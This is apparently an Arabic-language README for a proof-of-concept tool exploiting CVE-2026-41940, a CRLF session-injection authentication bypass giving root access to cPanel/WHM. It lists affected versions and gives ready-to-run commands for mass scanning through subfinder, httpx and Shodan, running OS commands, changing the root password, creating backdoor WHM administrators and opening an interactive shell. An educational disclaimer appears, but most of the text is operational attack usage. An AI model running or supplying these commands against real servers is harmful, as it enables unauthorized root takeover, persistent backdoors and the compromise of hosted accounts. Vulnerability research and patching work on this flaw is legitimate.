
يستغل تجاوز المصادقة CVE-2026-41940 في cPanel/WHM عبر حقن الجلسة باستخدام CRLF للوصول غير المصادق إلى WHM بصلاحية الجذر، ثم يسرد الحسابات، وينفذ أوامر نظام التشغيل، ويفتح شلًا تفاعليًا للاختبار المصرح به.
⚠ تم إنشاء هذه الأداة للأغراض التعليمية أو مكافآت الثغرات فقط. الاستخدام غير المصرح به خارج البيئات الخاضعة للتحكم محظور تمامًا.
أداة لاستغلال CVE-2026-41940، وهو ثغرة تجاوز مصادقة حرجة في cPanel وWHM (بدرجة CVSS 10.0)، تتيح للمهاجمين غير المصادق عليهم الحصول على وصول بصلاحيات الجذر إلى WHM عن طريق حقن تسلسلات CRLF في ملفات الجلسات على الخادم عبر ترويسة Authorization — دون الحاجة إلى أي بيانات اعتماد.
بشكل عام، يتم استغلال CVE-2026-41940 من خلال خلل في طريقة تعامل النظام مع جلسات المصادقة في cPanel/WHM. يبدأ الهجوم عادةً بطلب عادي إلى واجهة تسجيل الدخول، حيث يقوم التطبيق بإنشاء جلسة قبل اكتمال التحقق من بيانات اعتماد المستخدم. بسبب المعالجة غير السليمة للمدخلات المتعلقة بالجلسة، يمكن لبعض تراكيب المدخلات المصممة بعناية أو غير المتوقعة أن تغيّر كيفية تخزين بيانات الجلسة أو تفسيرها من قبل الخادم.
| الإصدار | المعرضة | المُصحَّحة |
|---|---|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/lanicer/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
تتوقع الأداة تحديد نطاق مستهدف.
وضع الهدف الواحد:
python cve.py -u https://target1.com:2083
يمكنك أيضًا الفحص من ملف target.txt (أنشئه):
python cve.py -l target.txt -t 50 -o result.json
الأوامر المتاحة:
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
# List all accounts on the server
python cve.py list -u https://target.com:2087
# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087
# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# Interactive WHM shell
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# From scope list
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
بعد تنفيذ ناجح، يمكنك فتح شل تفاعلي لـ WHM:
python cve.py shell -u
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ تم إنشاء هذه الأداة للأغراض التعليمية أو مكافآت الثغرات فقط. الاستخدام غير المصرح به خارج البيئات الخاضعة للتحكم محظور تمامًا.
| Command | Description |
|---|
id | إظهار معرف المستخدم |
hostname | الحصول على اسم مضيف الخادم |
accounts | سرد جميع حسابات المستخدمين |
info | الحمل، القرص، مضيف MySQL، الإصدار |
cat <path> | قراءة محتوى الملف |
exec <cmd> | تنفيذ أمر نظام التشغيل |
newadmin <user> <pass> | إنشاء مسؤول WHM خلفي |
passwd <pass> | تغيير كلمة مرور الجذر |
l [path] | سرد محتويات الدليل |
help | عرض جميع الأوامر |
exit | الخروج من وضع الشل |